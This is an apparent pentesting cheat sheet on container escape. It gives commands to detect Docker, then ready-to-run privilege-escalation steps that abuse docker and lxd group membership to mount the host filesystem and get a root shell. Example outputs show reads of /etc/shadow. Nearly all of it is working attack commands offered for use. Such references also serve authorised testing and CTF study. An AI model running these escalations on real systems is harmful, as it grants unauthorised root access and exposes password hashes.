DOCKER / LXD / CONTAINER ESCAPE
Check if in docker
Are you in a container? — Different escape techniques
cat /.dockerenv
cat /proc/1/cgroup | grep docker
Example Output
ls -la /.dockerenv
-rwxr-xr-x 1 root root 0 (FILE EXISTS = inside Docker)
cat /proc/1/cgroup
12:blkio:/docker/abc123...
(Confirmed: running inside Docker container)
Docker group
Mount host filesystem — Instant root on host
id | grep docker
docker images
docker run -v /:/mnt --rm -it <image> chroot /mnt bash
Example Output
id
uid=1000(john) gid=1000(john) groups=999(docker)
docker run -v /:/mnt --rm -it alpine chroot /mnt bash
# whoami
root
# cat /etc/shadow
root:$6$abc...
(Full root on host via docker)
LXD group
Mount host filesystem via LXD — Full root access to host
id | grep lxd
lxc image import alpine.tar.gz --alias alpine
lxc init alpine privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root
lxc start privesc
lxc exec privesc /bin/sh
Example Output
id: groups=110(lxd)
lxc image import alpine.tar.gz --alias alpine
lxc init alpine privesc -c security.privileged=true
lxc config device add privesc host disk source=/ path=/mnt/root
lxc start privesc
lxc exec privesc /bin/sh
# cat /mnt/root/etc/shadow
(Full host filesystem access)